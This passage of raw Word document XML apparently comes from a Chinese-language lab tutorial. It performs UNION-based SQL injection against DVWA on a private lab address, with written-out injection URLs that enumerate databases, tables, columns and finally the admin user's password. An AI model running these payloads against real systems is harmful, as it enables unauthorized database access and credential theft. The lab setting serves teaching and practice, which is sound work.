          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,1+--+</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8086C8" w14:textId="77777777" w:rsidR="00C3632C" w:rsidRPr="00C3632C" w:rsidRDefault="00C3632C" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00C3632C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="618B714E" wp14:editId="3D86A1F7">
            <wp:extent cx="5274310" cy="2660007"/>
            <wp:effectExtent l="19050" t="0" r="254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5274310" cy="2660007"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BF8165" w14:textId="77777777" w:rsidR="00C24966" w:rsidRPr="00CD76A0" w:rsidRDefault="009B1EB8"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数据库名“information- schema"，再提交以下查询链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D3D842" w14:textId="77777777" w:rsidR="00135842" w:rsidRPr="00CD76A0" w:rsidRDefault="0013584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schema_name%20from%20information_schema.schemata%20limit%20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,1+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C2A47" w14:textId="77777777" w:rsidR="00135842" w:rsidRPr="00135842" w:rsidRDefault="00135842" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378EB884" w14:textId="77777777" w:rsidR="00C24966" w:rsidRDefault="009B1EB8" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71005865" wp14:editId="354C0876">
            <wp:extent cx="5274310" cy="3594821"/>
            <wp:effectExtent l="19050" t="0" r="254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274310" cy="3594821"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="794967CE" w14:textId="77777777" w:rsidR="009B1EB8" w:rsidRPr="00CD76A0" w:rsidRDefault="009B1EB8"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数据库名“dedecms"，再提交以下查询链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10205176" w14:textId="77777777" w:rsidR="00135842" w:rsidRPr="00CD76A0" w:rsidRDefault="0013584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lastRenderedPageBreak/>
        <w:t>http://192.168.1.55:8080/dvwa/vulnerabilities/sqli/?id=1'and%201=2%20union%20select%201,schema_name%20from%20information_schema.schemata%20limit%20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,1+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E1C6A7" w14:textId="77777777" w:rsidR="00135842" w:rsidRPr="00135842" w:rsidRDefault="00135842" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A8EC3A4" w14:textId="77777777" w:rsidR="00C24966" w:rsidRDefault="0062154D" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40ED74C1" wp14:editId="70A4DA71">
            <wp:extent cx="5274310" cy="3107566"/>
            <wp:effectExtent l="19050" t="0" r="254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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3107566"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F455A8" w14:textId="77777777" w:rsidR="00C24966" w:rsidRPr="00CD76A0" w:rsidRDefault="0062154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页面返回空白，说明只有三个数据库: information- schema、dedecms和dvwa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1586B0CD" w14:textId="77777777" w:rsidR="00C24966" w:rsidRDefault="00C50F6E" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50F6E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>3、查询数据库中的表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3966BD" w14:textId="77777777" w:rsidR="00C47715" w:rsidRPr="00CD76A0" w:rsidRDefault="00C47715"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先来查询"dvwa "库中的所有表名，提交以下查询链接.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14274F55" w14:textId="77777777" w:rsidR="00C47715" w:rsidRPr="00CD76A0" w:rsidRDefault="00C47715"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table_name%20from%20information_schema.tables%20where table_schema=databas</w:t>
      </w:r>
      <w:r w:rsidR="00200887">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e() limit 0,1+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431B2E4B" w14:textId="77777777" w:rsidR="00C47715" w:rsidRPr="00CD76A0" w:rsidRDefault="00C47715"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其中指定了数据库名为database().表示为当前数据库。也可将其换"dvwa”库名十六进制代码，效果是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CBD8DA" w14:textId="77777777" w:rsidR="00C47715" w:rsidRPr="00CD76A0" w:rsidRDefault="00C4771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table_name%20from%20information_schema.tables%20where table_schema=0x64767761 limit 0,1+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4AE25D" w14:textId="77777777" w:rsidR="00C47715" w:rsidRDefault="00C47715" w:rsidP="00200887">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F5D0214" wp14:editId="2E25C229">
            <wp:extent cx="5274077" cy="3876675"/>
            <wp:effectExtent l="19050" t="0" r="2773"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5274310" cy="3876846"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DAC1FC" w14:textId="77777777" w:rsidR="00BD7188" w:rsidRPr="00200887" w:rsidRDefault="00C47715"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返回第一个表名为“guestbook"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D509CDD" w14:textId="77777777" w:rsidR="00BD7188" w:rsidRPr="00200887" w:rsidRDefault="00BD7188"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提交以下查询链接.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589EAC97" w14:textId="77777777" w:rsidR="00BD7188" w:rsidRPr="00CD76A0" w:rsidRDefault="00BD7188"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http://192.168.1.55:8080/dvwa/vulnerabilities/sqli/?id=1'and%201=2%20union%20select%201,table_name%20from%20information_schema.tables%20where table_schema=database() limit </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,1+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5002AF" w14:textId="77777777" w:rsidR="00BD7188" w:rsidRPr="00CD76A0" w:rsidRDefault="00BD7188" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A83C7A5" w14:textId="77777777" w:rsidR="00C47715" w:rsidRDefault="00BD7188" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79967356" wp14:editId="1BD39F48">
            <wp:extent cx="5269297" cy="3371850"/>
            <wp:effectExtent l="19050" t="0" r="7553"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5274310" cy="3375058"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8ED723" w14:textId="77777777" w:rsidR="006457D9" w:rsidRPr="006472F7" w:rsidRDefault="008A2375"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返回第二个表名为“users ",继续增加数据，可查询出数据库中的所有表名.不过我这库里面只有2个表名，这里已经得到了表名“users"，显然是管理员表，直接查询其中的字段即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE03D85" w14:textId="77777777" w:rsidR="006457D9" w:rsidRDefault="006457D9" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006457D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00F94CFF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>、查询表中的列</w:t>
      </w:r>
      <w:r w:rsidRPr="006457D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>名及内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA4EF10" w14:textId="77777777" w:rsidR="006457D9" w:rsidRPr="00CD76A0" w:rsidRDefault="006C1CB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现在查询"user"表中的列名.提交以下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5173E0D3" w14:textId="77777777" w:rsidR="00713485" w:rsidRPr="00CD76A0" w:rsidRDefault="00713485"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table_name%20from%20information_schema.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>%20wheretable_</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">=0x7573657273 limit </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,1+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6584D857" w14:textId="77777777" w:rsidR="006C1CB3" w:rsidRDefault="00713485" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00713485">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20925C82" wp14:editId="29F3A86A">
            <wp:extent cx="5274310" cy="2295525"/>
            <wp:effectExtent l="19050" t="0" r="254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5274310" cy="2295525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="346C6BB4" w14:textId="77777777" w:rsidR="0030734A" w:rsidRPr="00CD76A0" w:rsidRDefault="0030734A"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其中的0x7573657273为表名“users”的十六进制代码，提交查询后得到第一个列名为"first_name"，再继续增加数字进行查询，得到列名</w:t>
      </w:r>
      <w:r w:rsidR="00874B4B" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>user和password</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6CBA06" w14:textId="77777777" w:rsidR="0030734A" w:rsidRPr="00CD76A0" w:rsidRDefault="006275A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column_name%20from%20information_schema.columns%20where%20table_name=0x7573657273%20limit%20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,1+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2945A7" w14:textId="77777777" w:rsidR="006275A3" w:rsidRDefault="006275A3" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0390C566" wp14:editId="63F19A31">
            <wp:extent cx="5274310" cy="398145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274310" cy="3981450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="066210D5" w14:textId="77777777" w:rsidR="0030734A" w:rsidRPr="00CD76A0" w:rsidRDefault="006275A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继续提交以下代码:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2C63E9" w14:textId="77777777" w:rsidR="006275A3" w:rsidRPr="00CD76A0" w:rsidRDefault="006275A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201=2%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_name=0x7573657273%20limit%20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,1+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7101EC1C" w14:textId="77777777" w:rsidR="006275A3" w:rsidRDefault="00874B4B" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46B53639" wp14:editId="30EDFC2E">
            <wp:extent cx="5269725" cy="2590800"/>
            <wp:effectExtent l="19050" t="0" r="7125"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5274310" cy="2593054"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CBE1C9" w14:textId="77777777" w:rsidR="00113DAF" w:rsidRPr="00CD76A0" w:rsidRDefault="00113DA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其中最重要的列名为“user”和“password"，分别为用户名列和密码列，直接查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A1C059" w14:textId="77777777" w:rsidR="00874B4B" w:rsidRPr="00CD76A0" w:rsidRDefault="00113DA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询这两个列名中的数据内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195CF891" w14:textId="77777777" w:rsidR="00113DAF" w:rsidRPr="00CD76A0" w:rsidRDefault="00113DA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1=2unionselect</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1,user from </w:t>
      </w:r>
      <w:r w:rsidR="00B730F6" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB88B2D" w14:textId="77777777" w:rsidR="00B730F6" w:rsidRDefault="00B730F6" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34F03186" wp14:editId="7DA8C016">
            <wp:extent cx="5274310" cy="4185960"/>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274310" cy="4185960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BFEF2D" w14:textId="77777777" w:rsidR="00B730F6" w:rsidRPr="00CD76A0" w:rsidRDefault="00B730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用户名“admin、gordonb、1337、pablo、smithy，再提交以下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6647632B" w14:textId="77777777" w:rsidR="007D1DA9" w:rsidRPr="00200887" w:rsidRDefault="00B730F6"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lastRenderedPageBreak/>
        <w:t>http://192.168.1.55:8080/dvwa/vulnerabilities/sqli/?id=1'and1=2unionselect</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1,password from users where user=</w:t>
      </w:r>
      <w:r w:rsidR="00200887">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x61646D696E+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB44FF2" w14:textId="77777777" w:rsidR="007D1DA9" w:rsidRPr="00CD76A0" w:rsidRDefault="007D1DA9"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0x61646D696E为用户名“admin”的十六进制代码，查询后得到密码password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6BE343" w14:textId="77777777" w:rsidR="00B730F6" w:rsidRDefault="007D1DA9" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DDE0719" wp14:editId="59C334B4">
            <wp:extent cx="5273714" cy="3038475"/>
            <wp:effectExtent l="19050" t="0" r="3136"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5274310" cy="3038819"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FA4DD7" w14:textId="77777777" w:rsidR="007D1DA9" w:rsidRDefault="00EB64CE" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C9C970" wp14:editId="4841A4AE">
            <wp:extent cx="5271770" cy="2419350"/>
            <wp:effectExtent l="19050" t="0" r="508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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274729" cy="2420708"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15891C68" w14:textId="77777777" w:rsidR="00EB64CE" w:rsidRPr="006472F7" w:rsidRDefault="00EB64CE"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下面就是测试管理员帐号和密码登录，后面就不在操作了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48137974" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="005060C3" w:rsidRDefault="009945DF" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
